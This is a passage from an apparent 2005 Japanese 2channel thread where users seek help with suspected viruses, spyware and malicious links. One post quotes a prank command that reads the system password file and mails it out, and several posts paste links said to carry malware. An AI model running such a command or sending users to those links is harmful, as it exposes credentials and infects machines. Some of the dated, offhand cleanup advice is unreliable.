191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 03:38:31 ]: ググっても出てこないのはウィルススパイウェアが作ったランダムなファイル名だ思っていい
192 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 08:09:41 ]: >>189
ほんとだ。
でもね、サイトには自分のEXEの一覧を全部ぶちまけてる人が
たくさん居るし、ＭＳもぶちまけてるんですよ。

それでググって一件も見つからないって、あり得ない。
そもそもMSのモジュール群でも、sysytem32につっこんであるような
プログラムは８文字になるように収めてるんですよ。
これは、DOSライクな操作の際の利便なんかを考えてのことなんです。
だから、msencode で検索してごらんなさい。たくさん出てくるから。

ということで、msencode+drv.exeという既存プログラムとウィルスの
ネーミング規則を合体させたモジュールだと思う。
193 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 08:44:25 ]: >>189
俺にはmsencode.dllしかない
194 名前：189 mailto:sage [2005/04/04(月) 08:51:36 ]: >>190-193
お答えありがとうございます。
接続先はIPアドレス検索したらJPホスト以外の情報ありませんでした。
IPアドレス自体は遮断して検索してて重くなって再起動かけたもんでうやむやに・・・
ログイン後、勝手に自動起動してCPU食ってました。
msconfigのスタートアップ項目に載ってないし、レジストリのほうも見つからなかったのに・・・
とりあえず実ファイルを削除して様子見ておきます。
195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 08:54:33 ]: >>194
どこか、ノートンでもバスターでも入れてるんなら、
それを検体として、状況を書いて提出しなよ。解析してくれるよ。
196 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 09:24:01 ]: 漠然とした質問で申し訳ないんだけど、
友人が「画面が真赤になって動かない」と電話をしてきました。
話によると再起動をしても変わらないそうです。
ウィルスバスターも何も入っていなかったのかもしれません。

現在機種などの確認をとっているところなので、何か情報が増えたら書き込みます。
197 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 10:37:59 ]: 解決しますた
198 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 11:17:00 ]: age
199 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 13:56:19 ]: 携帯からですが、よろしくお願いします。

リンクを踏んだらノートンが反応し、たくさん窓が開き出しました。
怖くなり電源を切ってしまったので、
どこを開き出したのか、はっきりと確認しておりませんが、
窓の名前？にTelenet(以下不明)という文字を見ました。
すぐにノートンでウィルススキャンをしましたが、何も検出されず、
何のウィルスに反応したのか心配になり、調べてみましたところ、
Trojan.Horse
なんとかLoveletter
(二つともスペルに自信ありません)
というウィルスだったようです。
スキャンして何も検出されなかったということは、
感染していないと思っていいのでしょうか？
(ちなみに更新はマメにしておりました)

窓がバーっと開いたのがとても気がかりなので、その後パソコンは開いておりません。

どうかご助言をお願い致します。
200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 14:07:01 ]: >>199
どこを開いたのか分からない限り、正確なアドバイスはできません。
201 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 14:13:06 ]: 199です。
何を踏んだかが重要だったのですね。
説明不足で申し訳ございませんでした。
調べてきます！
202 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 14:24:49 ]: >>201
絶対に貼る時にhttpを抜いてくださいよ。あなたみたいな悲劇が起こりますから。
203 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 14:25:36 ]: すいませんが、わかる方教えてください。
踏んでしまったのですが、特に今の所何も異常ありません。

> 222 名前：番組の途中ですが名無しです [sage] 2005/04/04(月) 12:53:22 ID:4N5O+vD10
> 大人気漫画のキャラクターの猫のぬいぐるみが発売
> ht●●●tp://www.yomiuri.co.nr/sports/news/20050401ie01.htm
>
> ↑これってあずまんがのねねここねねこ？
> 225 名前：番組の途中ですが名無しです [] 2005/04/04(月) 12:54:23 ID:wDzeOD7t0
> >222
> (・∀・)ｩｨﾙｽｰ!!　＆　ﾌﾞﾗｸﾗ
204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 14:36:24 ]: >>203
どうも記事とスパイウェアが仕込んであるみたいですね。ソースを見るぶんには。
しかし、こんなyomiuri.co.urなんて申請できるんですね。緩い国だ。
205 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 14:38:01 ]: すいません。よろしくお願いします。

【使用OS】 XP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】無料版Zoneのみ
【ちゃんとUpdateしてるか】していない。
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】　今の所無し。
【何をしたらそんなことになったのか】 urlを踏んだ。
【これまでにとった措置】取り合えず、ﾏｲドキュメントは空。msminは起動していない。
【その他の質問】簡易メーラーで自分あてにメール。何事も無し。
ぐぐっても情報は無し。url先は北欧の外国語・・・。
206 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 14:41:38 ]: >>205
踏んだURLをhttpを抜いた形で出してください。
207 名前：２０３＝２０５ [2005/04/04(月) 14:42:45 ]: スパイウェア・・・ですか？
行き先や趣向の調査とかですか？無頓着でした。
駆除する方法があると聞いてますが、駆除すればお終いなんですかね。
208 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 14:52:00 ]: 【使用OS】 XP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ノートン
【ちゃんとUpdateしてるか】していない。
【スキャンした結果（ウイルス名・発見場所）】 TrojanHorse
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】　今の所無し。
【何をしたらそんなことになったのか】 urlを踏んだ。
【これまでにとった措置】ノートンでスキャン。とりあえず脅威は発見されなかった。
しかしノートンの活動ログみてみるとそのウィルスの項目に「修復できませんでした」「アクセスが拒否されました」と書いてある。
209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 14:53:15 ]: >>208
どこを踏んだのか、httpを抜いた形で貼ってください。
210 名前：208 [2005/04/04(月) 14:55:13 ]: >>209
www.albinoblacksheep.com/flash/open.html
211 名前：209 mailto:sage [2005/04/04(月) 15:09:49 ]: >>210
ひぃぃ。考えが甘かった・・・
僕程度の実力でどうこうできるものではありませんでした・・・
他の人にパス
212 名前：名無しさん＠お腹いっぱい。 [2005/04/04(月) 15:15:47 ]: >>211
おまえブラクラのサイト運営してブラクラサイトを探し回ってる野郎だろ
213 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 15:30:53 ]: >>212
関係ねー厨房はすっこんでろよｗ
214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/04(月) 15:40:42 ]: >>213
なにもできないお前も関係ねーだろｗ
厨以下ｗ
215 名前：209 mailto:sage [2005/04/04(月) 15:47:01 ]: まぁまぁ、ケンカしないでください。ちなみに私はブラクラサイトを運営してません。
ソース表示しようと思ったら、思わず踏んじゃいました（ｗ
予備機でアクセスしてます。
本体はレジストリチェックをしたところ、意味不明の増加があったので削除しましたが、
念のため、ghostでリカバ（ｗ
>>208さん、本当なら同じ状況になったのだから、ここから復活させて
方法を教えるのがいいんでしょうが、ブラクラじゃなくて、ウィルスがらみでは
ちょっと、メールで送られたりしたらとんでもないので。
216 名前：２０３＝２０５ [2005/04/04(月) 15:52:17 ]: >>204
どうもです、一応spybotで駆除が完了したようです。
１０ヶ月使用してたＰＣですが２０匹ほどいたみたいです。

ありがとうございました。
217 名前：☆ [2005/04/04(月) 21:52:41 ]: ﾎﾑぺなどで出るIPって何か情報調べられるんですか？
218 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 01:12:23 ]: 3/26に親父から電話があって、
どうもパソコンが起動しなくなったらしい・・・

で、見に行ってみると確かにWindowsのロゴすら出てこない
っていうか、ハードディスクを読んでいないような気が・・・

ハードディスクのフォーマットを試みたが、
0%完了のまま固まって動かん

OSは、XPだが、
なんかWin95/CIHに感染したっぽい
でも、確かNT系のOSにはかんせんしないハズ！

誰か3/26に同じような症状になった人います？
219 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 01:15:26 ]: >>218
うちのオヤジもなった。
フロッピ入れてた。
220 名前：218 mailto:sage [2005/04/05(火) 01:16:57 ]: >219
うちの親父のマシン
FDDありません
221 名前：219 mailto:sage [2005/04/05(火) 01:18:57 ]: >>220
そっか。オレは二時間あーでもこーでもないってやってた。
起動するときのFDDチェックの音がかわってるな、と思ったら入ってた(;^ω^)
222 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 01:23:23 ]: >221
うちは、結局、販売店にもって言って見てもらったが、
ハードの故障と言うことで、修理になった。
保障期間内なので無償だが、
おいらは今だにWin95/CIH系のウィルスが原因だと思っている。

まあ、親父のマシンにはノートン先生もちゃんといらっしゃったハズですが・・・
親父が、どんな操作してるか分からんから何とも言えん
223 名前：219 mailto:sage [2005/04/05(火) 01:31:23 ]: >>222
ノートンが居て、Win95/CIH系なんて言う、古典落語に引っかかるはずが無い。
マジでＢＩＯＳ吹っ飛んだとか、チップセットが飛んだんだろうよ。
224 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 01:39:06 ]: >>223
ウイルスと古典落語の関連性を詳しく。
225 名前：219 mailto:sage [2005/04/05(火) 01:52:36 ]: >>224
すまん。「こてん」で古典落語を登録してた。
226 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 02:59:15 ]: WORM_MYTOB.Vとやらが送られてきた
メールからウィスルとか初めてだからドキっとしてしまったよ
これは新しいヤツなのかな？
227 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 03:11:06 ]: 名前で検索すればぁ？
228 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 03:58:30 ]: >>225
「こてん」で古典落語を登録した経緯を詳しくｗ
229 名前：トーシロー mailto:sage [2005/04/05(火) 12:33:36 ]: >>218
フォーマットを試行できるということはBIOS自体はHDDを認識してるんだろうから
単にHDDの故障じゃないの。
230 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 13:20:18 ]: タスクマネージャを開くとプロセスに乗っている部分で文字化けが数カ所あるんだが
ウィルスなんですか？
231 名前：名無しさん＠お腹いっぱい。 [2005/04/05(火) 13:34:10 ]: 外国産のウイルスかスパイウェアだろewidoでスキャンしろ！！！！！！！！！！！！
232 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 17:52:08 ]: VBS LOVE LETTER A ってヤバいのだろうか？一応アンチウィルスは入っているが・・・。
いささか心配…。
233 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 18:16:04 ]: >>232
2ちゃん見てて、アンチウィルスソフトがノートンなら、
ノートントラップだから、心配ない
234 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 18:17:17 ]: >>233
2ちゃん見てる時に、ノートンが反応して、
検出されたのが、LOVE LETTERならって意味ね。
書き方が悪かった。ｽﾏｿ○┓ﾍﾟｺ
235 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/05(火) 19:27:46 ]: >>233 >>234
おっしゃる通りです。2ちゃん見てての出来事です。
ありがとうございました。安心しました。
236 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:03:19 ]: 昨日から、ウイルスらしきものがあったので、少し遊んでた。

実況しようかともおもったが、とりあえずさくっと、対処したら症状が出なくなったので、実況なしだが。
あとで、詳しく紹介する。
237 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:06:59 ]: やっぱりやめ　糸冬　了
238 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:08:45 ]: いや～～、厄介なウイルスのようだった。

なんせ、
ノートン反応せず。
トレンドオンライン反応せず。

唯一、tmp.state.tmp　というファイルが%system%system32\driversでリアルタイムスキャンに引っかかる程度。
ただし、これはリアルタイムスキャンで排除しているので、感染前に対処できていた模様。
それとは異なる汚染源がある様だった。
239 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:10:19 ]: 【使用OS】 XP
【WindowsUpdateしてるか】してるす
【AntiVirusは何を使っているか】ウイルスバスター
【ちゃんとUpdateしてるか】してるす
【スキャンした結果（ウイルス名・発見場所）】 TROJ_ANICMOO.D　（発見場所は下記参照して下さい）
【別のオンラインスキャンしたならその結果は】ノートンオンラインウイルススキャン　ウイルスなし
【症状を具体的に、分かる限りすべて書く】ウイルスバスターで隔離できませんでしたってなった
【何をしたらそんなことになったのか】アプロダのjpgを開いた
【これまでにとった措置】 Temporary Internet Files　TEMP　Cookie　の削除
【その他の質問】
ttp://samurize.parfe.jp/upload/source/up1331.jpg
これをふんでTROJ_ANICMOO.Dを検出しました。
（IE6で JavaScript Javaの実行 ActiveX はoffにしてあります）

\Temporary Internet Files\content.IE5\2D6CWH6L\spoloit[1].anr を隔離できませんでした
\Temporary Internet Files\content.IE5\2D6CWH6L\spoloit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\CNTBQIZ9\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\CNTBQIZ9\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\Q5TMFYT0\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\Q5TMFYT0\sploit[1].anr を隔離できませんでした
\Temporary Internet Files\Content.IE5\3UO7B9KT\sploit[1].anr を隔離できませんでした

ってなり、ウイルスバスターのHPで検索してもデーベースにはありませんってなります。
msconfigのスタートアップには新たなスタートアップ項目は追加されてません。

ちゃんと駆除できてるか心配です。最新のウイルスでしょうか？
240 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:19:33 ]: >>238
というわけで、
# どういうわけだ。
#239 とは全く関係ないんだが。

１．どうも最近Winnyやってもないのに帯域が食われている
２．リアルタイムスキャンでなんか引っかかることが良くある

場合には、smss.exeを検索してプロパティみてみそ。
240kByteだったら、さくっと削除しないといけないみたいね。
普通は45～50kByte程度だから。
俺の場合には %system%system32\drivers　にあったけど。

ただし、Systemが起動しているので、通常の起動状態では削除できないよん
241 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:25:39 ]: 特徴としては次のとおり

なぜだか　IRCサーバに接続している　(　ポート6667 )
それ以外に　ポート1500程度で接続している(　IRC　のレスポンスを出しているみたいだが　)
数百MByteの動画ファイルを交換している
smssが他のポート80を叩いている

うーーん、都合の良いProxyにされちゃったのかなぁ。
242 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:29:01 ]: 書き方が悪いね。書き直すね。

自分がIRCを立ち上げていないにもかかわらずIRCサーバに接続している　(　ポート6667 )
自分とIRCサーバの間で数百MByteの動画ファイルを交換している
自分がsmssが他のポート80を叩いている

誰かがポート1500程度で接続している(　IRC　のレスポンスを出しているみたいだが　)
このセッションのプロセス名は葱によると不明となっている
こいつはWin2k臭い

そんなところか。
243 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 00:32:20 ]: 　　　　　　　　　In＿℡
　　　　　　 ⊂（＠ε＠-）つ、 -3 　電脳空間では最低の詭弁師
　　　　　／／（雑音/_/::::|　　　　←ネット内弁慶
　　　　　 |:::|/⊂ヽノ|:::| ／」　　　　決め技は「遁走」　
　　　／￣￣旦￣￣￣／|
　　／＿＿＿＿＿＿／ .| |
　　| |-----------| |
244 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:36:32 ]: Spybotなどのチェックも問題なし。
ダイアルアップルータもあり外からの接続も拒否しているので、
どうやら、smssが内から外に接続しているようだ。

葱によると、不明なものをのぞいて、smss.exeがセッションを張っているらしい。
これが相当怪しい。っちゅうか、セッションマネージャがセッションを張るんか?

というわけで、さくっと該当するsmss.exeをポアしたところ症状が出なくなりました。

と言う顛末でおま。

ま、気をつけてね。
245 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 00:37:06 ]: >>239
心配ない。インターネットフォルダの一時ファイルだから。
246 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 00:42:26 ]: >>243
削除したファイルがサルベージできたら、どっかにおいてやるよ。
247 名前：239 mailto:sage [2005/04/06(水) 00:47:57 ]: >>245
そうですか！すげー心配でした。答えてくれてありがとうございます。
248 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 00:48:39 ]: >>244
おまえはﾄﾛｲを検出するｿﾌﾄの存在もしらないのか。
その手のﾌｧｲﾙならﾊﾟﾀｰﾝ定義ですぐに引っ掛かる。
249 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 01:16:16 ]: 　　　馬鹿一確の俺にどうかアドバイスを
【使用OS】 xp
【WindowsUpdateしてるか】してない
【AntiVirusは何を使っているか】つかってない
【ちゃんとUpdateしてるか】してない
【スキャンした結果（ウイルス名・発見場所）】できない
【別のオンラインスキャンしたならその結果は】してない
【症状を具体的に、分かる限りすべて書く】立ち上がり始めると、フリーズ
　　　　　　　　　　　　　　　　　　　　　しばらくすると「HI」とでてくる。
　　　　　　　　　　　　　　　　　　　　　クリックすると消える。
　　　　　　　　　　　　　　　　　　　　で、画面は背景のみで何も立ち上がらない。
【何をしたらそんなことになったのか】 lolworld.ecstazy.info/cjstats/index.html
　　　　　　　　　　　　　　　　　　　これふんだ
【これまでにとった措置】なにもしてない　できない
【その他の質問】 OS再インストする方法教えてください。
　　　　　　　　リカバリCDいれて電源入れても読みません。
250 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 01:30:47 ]: >>249
緊急事態時に頼りにするのは２ちゃんじゃなくて友達にしよう。
家に来て貰っても電話でもそっちのほうが早く解決すると思うよ。
もしかしたらBIOSに入って設定変更しないといけないかもしれないから
そういうの文章で書くのめんどいし伝わらないし、ね。
251 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 01:38:22 ]: >>250
レス、ありがとう。
こんな遅い時間に返事くれてちょっと嬉しいよ。
また,明日にでも誰かに聞くことにします。
252 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 05:01:18 ]: アミララって何ですか？
253 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 08:22:25 ]: あるスレのメール欄に「ｓａｇｅ　ｃａｔ／ｅｔｃ／ｐａｓｓｗｄ　│ｍａｉｌ　ｎｏｂｏｄｙ（以下ｃａｔ～に略）」（念のため全角で書いてます）と
半角で書いてあり、クリックしてみました。outlookが立ち上がり、「ｃａｔ～」の部分だけコピーしてメモ帳(txt)ファイルに貼り付け保存しました。
outlookはコピーした後、終了しました。
メモ帳ファイルには貼り付けた一文以外にも大して重要ではないですが文章や単語を書き殴ってあって、文字通りメモとして使ってました。

「ｃａｔ～」のうち「ｃａｔ／ｅｔｃ／ｐａｓｓｗｄ」をブラウザのアドレス欄に貼って実行してみました。
すると、ノートンが警告して「Unix.Penguin」と出ましたので、ブラクラと判断し、ブラウザを終了しました。
しばらく後、さっきのメモ帳を開けようとすると、ノートンが警告して、「Unix.Penguin」が反応しました。
シマンテックでウイルススキャンし、「Unix.Penguin」について調べると、

「シェルスクリプトファイル内で Unix.Penguinが検出された場合、そのファイルにはおそらく、ユーザのシステムパスワードデータファイルを
電子メールで送信するように指示する命令が含まれています。」とありました。
また、駆除方法として「不審なシェルスクリプト（自分で書いた記憶がないシェルスクリプトなど）が存在する場合、そのスクリプトを削除」とありました。

メモ帳ファイルを削除しようと思いましたが、実行しようとするたびにノートン警告が起動し削除出来ません。
幸いそのメモ帳はフォルダ内にあったので、他のファイルを全て移して、フォルダごと削除しゴミ箱からも消去しました。

これで一安心と思っていたのですが、よく思い出してみると、「ｃａｔ～」の部分をメモ帳にコピーして保存した後に、ヤフーオクションIDにログインしたのを思い出しました。

私の対処方法は良かったのでしょうか？また、ヤフーオクションID及びパスワードは電子メールで送信されたのでしょうか？宜しくお願いします。
254 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 09:01:35 ]: >>253
とりあえずパスワードを変更しる
255 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 17:21:51 ]: 雇われるウイルス作成犯!?
ttp://headlines.yahoo.co.jp/hl?a=20050406-00000097-myc-sci
256 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 18:22:41 ]: >>255
YAHOO！NEWS　ウソ臭え
Aladdin Knowledge Systemsは情報を詳細に掴んでいるんだからソフトを買えと？
バカじゃねえの
257 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 19:03:59 ]: ノートンでトロイを検出出来る？
258 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 19:21:43 ]: >>257
ある程度はね
259 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 23:05:24 ]: Unix.Penguinってトロイじゃないの？
260 名前：名無しさん＠お腹いっぱい。 [2005/04/06(水) 23:24:45 ]: 自己増殖系のウィルスとファイルを消していくウィルスを同時に実行したらどっちが勝ちますか？
261 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 23:37:58 ]: >>260
詳しく
262 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/06(水) 23:49:10 ]: 　　　　　　　　　In＿℡
　　　　　　 ⊂（＠ε＠-）つ、 -3 　電脳空間では最低の詭弁師
　　　　　／／（雑音/_/::::|　　　　←ネット内弁慶
　　　　　 |:::|/⊂ヽノ|:::| ／」　　　　決め技は「遁走」　
　　　／￣￣旦￣￣￣／|
　　／＿＿＿＿＿＿／ .| |
　　| |-----------| |
263 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 03:49:24 ]: なんか画面の右下に検索する奴がでるようになったのですが
これウィルスなのでしょうか
終了もできないし
タスクバーのとこから出現したりひっこんだりするのでうざくてしかなたないっす
これどうにかならないんですか？
264 名前：名無しさん＠お腹いっぱい。 [2005/04/07(木) 07:44:51 ]: >>263
>>1
265 名前：名無しさん＠お腹いっぱい。 [2005/04/07(木) 11:47:49 ]: 【使用OS】 XP SP1
【WindowsUpdateしてるか】２週間くらいしてないかも・・・
【AntiVirusは何を使っているか】ウィルスバスター2004
【ちゃんとUpdateしてるか】毎日してます。症状が出る２時間くらい前にもしました
【症状を具体的に、分かる限りすべて書く】
ＯＳ立ち上げると勝手にスタンバイ状態にされて何も出来ないです。
電源入れた直後に青い画面に英文字で色々書かれた画面がでます。
【何をしたらそんなことになったのか】
リアルワンプレイヤーでストリームラジオ？流していたら、
リアルから何らかの命令が来ましたが切断しますか？（よく覚えていません）
みたいなメッセージがリアルのウインドウで表示されたので、それには答えずウインドウ自体を閉じたら
直後に、スタンバイ状態にされました。
何度も立ち上げなおしていたら、別の人がアクセスしています、というメッセージが表示されました。
数ヶ月前も同じように強制的にスタンバイに状態にされた事がありますが
何度か立ち上げなおしてたら、その症状は出なくなった気がします。その後ウィルススキャンしましたが
異常なしと判断されました。
【これまでにとった措置】トゥルーイメージで１年前に作った、システムの入った
パーティションイメージを復元しましたが、直りませんでした。
【その他の質問】
ウィルスなのかスパイウェアなのか分かりませんがよろしくお願いします。
266 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 12:06:15 ]: :::::::::::::::::::::::::::::　　　　,.-ヽ
::::::::::::::::::::::　　　____,;'　,;- i　　　　　　　　　　　　　　　　　　　　　　　　へ､　　　 /;へ＼
::::::::::::::::::　　 ,;;'"　　i　i　・i;　　　　　　　　　　　　　　　　　　　　　　//　_l::|＿＿_l::|＿ヽ:ヽ
:::::::::::::::　　,;'":;;,,,,,,　;!,　`'''i; 　　　　　　　　／￣￣￣￣＼,,　　　　|l／－､－､:::::::::::::::`::|
:::::::::::　　,/'"　　　'''',,,,''''--i　　　　　　　　/　　　　　　＿＿ヽ　　 /::::::|　・|・　| ､::::::::::::::＼
:::::::::　 ;/　 .,,,,,,,,,,,,,,,,,　　　;i'⌒i;　　　　　| 　　　　　　|　　 |､　　 /::／　`-●－′　＼:::::::::::ヽ
:::::::　 i;"　　　　　___,,,,,,,　　`i".　　　　　|　　　　　　 ∩─| |　　,|/ ──　|　 ── 　ヽ:::::::::|
:::::::　i;　　　　,,;'"""　`';,,,　　"`i;　　　　　|　　　　　　∪　 `l　　 |.　──　|　 ──　　　.|::::::::|
:::::::　|　　''''''i　,,,,,,,,,,　　`'--''''"　　　　　　ヽ＿＿／　　_.ノ　　|　──　|　 ── 　　 |:::::_l＿_
:::::::　|.　　　 i'"　　　"; 　　　　　　　　　　　|――― ､". 　　　ヽ（＿＿|＿＿＿＿　 /::::| 新 |
:::::::　|;　　　 `-、.,;''" 　　　　　　　　　　　／￣￣￣￣＾ヽ∞=､　＼　　　　　　　　　 /:::,/| 品 |
::::::::　 i; 　　　　`'-----j　　　　　　　　　|　|　　　　　|　　|っ:::::）　　l━━（ｔ）━━━━┥ |＿__|
267 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 12:08:14 ]: >>265
俺もまったく同じ現象が起きた。
結局、そのときはメモリー不良だった。

＞電源入れた直後に青い画面に英文字で色々書かれた画面がでます。

これに何て書いてあるかデジカメに撮るなりしてアップしてくれないと
一生不明のままだと思うよ。
268 名前：名無しさん＠お腹いっぱい。 [2005/04/07(木) 12:49:10 ]: >>267
どうも
お、そうなんですか
ハード的な問題の可能性も強いと言う事ですか
だとしたら復元とかしなきゃ良かった・・・
帰宅したらデジカメで撮ってみます
269 名前：名無しさん＠お腹いっぱい。 [2005/04/07(木) 15:34:23 ]: あげ
270 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 16:45:02 ]: 教えてください。

【使用OS】XP　homeedition
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】norton　antivirus2005
【ちゃんとUpdateしてるか】してます。
【スキャンした結果（ウイルス名・発見場所）】Ｂllodhound.exploit.6　　　
【別のオンラインスキャンしたならその結果は】してない
【症状を具体的に、分かる限りすべて書く】特にになにもない
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
ノートンでも削除できなかったらしく、ウイルスチェックしたら検疫済みとのこと。
今のところなんの害もないのですが、駆除しなければいけないんですよね？
駆除の仕方がわからなくて。
お願いいたします
271 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 17:12:47 ]: >>270
いえ。そのまま放っておいて害はありません。
272 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 17:20:01 ]: >>271
そうなんですか！
ありがとうございます。たすかりました。
273 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 17:46:27 ]: 対処方法わかる方アドバイスお願いします。

【使用OS】Ｗｉｎｄｏｗｓ９８ＳＥ
【WindowsUpdateしてるか】していた
【AntiVirusは何を使っているか】プリインストールのノートンアンチウイルス
【ちゃんとUpdateしてるか】たまにしていた
【スキャンした結果（ウイルス名・発見場所）】異常なし
【別のオンラインスキャンしたならその結果は】異常なし

【症状を具体的に、分かる限りすべて書く】
アウトルックの受信トレイなど＜＊．ｄｂｘ＞のファイルにゴミ（パソコン内のデータ）が入る。
消してもアウトルック立ち上げると再び同じようなファイルができる。
（新しい空のファイルのはずなのに７５ＫＢ）
また、アドレス帳を更新したら、デスクトップに意味不明のゴミファイルができる。
（主にアドレス帳の中身）

【何をしたらそんなことになったのか】不明。
【これまでにとった措置】
すべてのドライブをフォーマットし、再度プリインストールしたが、それでも直らない。
現在はアウトルックエクスプレスをアンインストールし、メールはｗｅｂ上でしている。
【その他の質問】
ブロードバンドルータ（ＮＴＴのウエブキャスター）使用していますが、
ルータがウイルスに感染するということはあるのでしょうか？
（オヤジの）もう一台のパソコンがセキュリティー対策甘いので、それが原因でしょうか？
274 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 18:18:16 ]: >>189 ファイル消すと違う名前ms［任意の英字列］.exeがＰＣ起動時に
作成されませんか？知り合いのＰＣが調子悪いって事で呼び出されて
バスターオンラインスキャンとノートン常駐で発見出来ず。a2スキャンで
１個見つかってその他２つはレジストリ項目等を探って対処。
残り１つが189さんの現象に酷似してますした。てかどういう使い方してるんだか
俺の知り合いは・・・ｎｙやＭＸはHDには入って無かったのに・・・

SSM入れて監視した所svchost.exeプロセス経由でms［任意の英字列］.exe
が立ち上がってきてプロセス切って単独で立ち上げようとしても機能しない
プログラムみたいでした。取りあえずms［任意の英字列］.exeのアクセス権を
アドミンでも無効にして再起動後も立ち上がらない様にして放置しました・・・

すっかりその事忘れてたけどコノスレ読んでて思い出したのでググってみたら
ttp://www.atmarkit.co.jp/fwin2k/win2ktips/400svchost/svchost.html
これでぁゃιぃヤツ見つけられるかも。
ms［任意の英字列］.exeは476KB位(手元にPC無いのでMD5とかは分かんない)で
Distributed Link Tracking Clientとして80番ポートでWAN側にアクセスを試みる
ヤツでした。違うウィルスだったらスマソ。
275 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 18:22:28 ]: >>273
OEのメールアカウントに余計なものが登録されているはずだ
デスクトップに.wa~のファイルが出来るのはウィンドウズアップデートで直っているはずだな
俺はXPだから詳細は知らない
276 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 18:38:39 ]: 最近、exploit.6のカキコ多いな

少なくてもｽﾚ内くらいは検索すりゃいいのに・・・。
277 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/07(木) 19:04:56 ]: >>270
チミ、ソフトウェアの取説読んでるのか？
ヘルプなりなんなり一通り目を通そう。
278 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 08:38:41 ]: とあるURLを踏んでしまいました
後で、URLの鑑定スレにお願いした所、ウィルス反応ありという事で、
スパイボットサーチをかけた後、トレンドマイクロのオンラインスキャンをかけたのですが、後者では何も見つかりませんでした。
その為今現在なんのウィルスに感染した筈なのかも解りません。
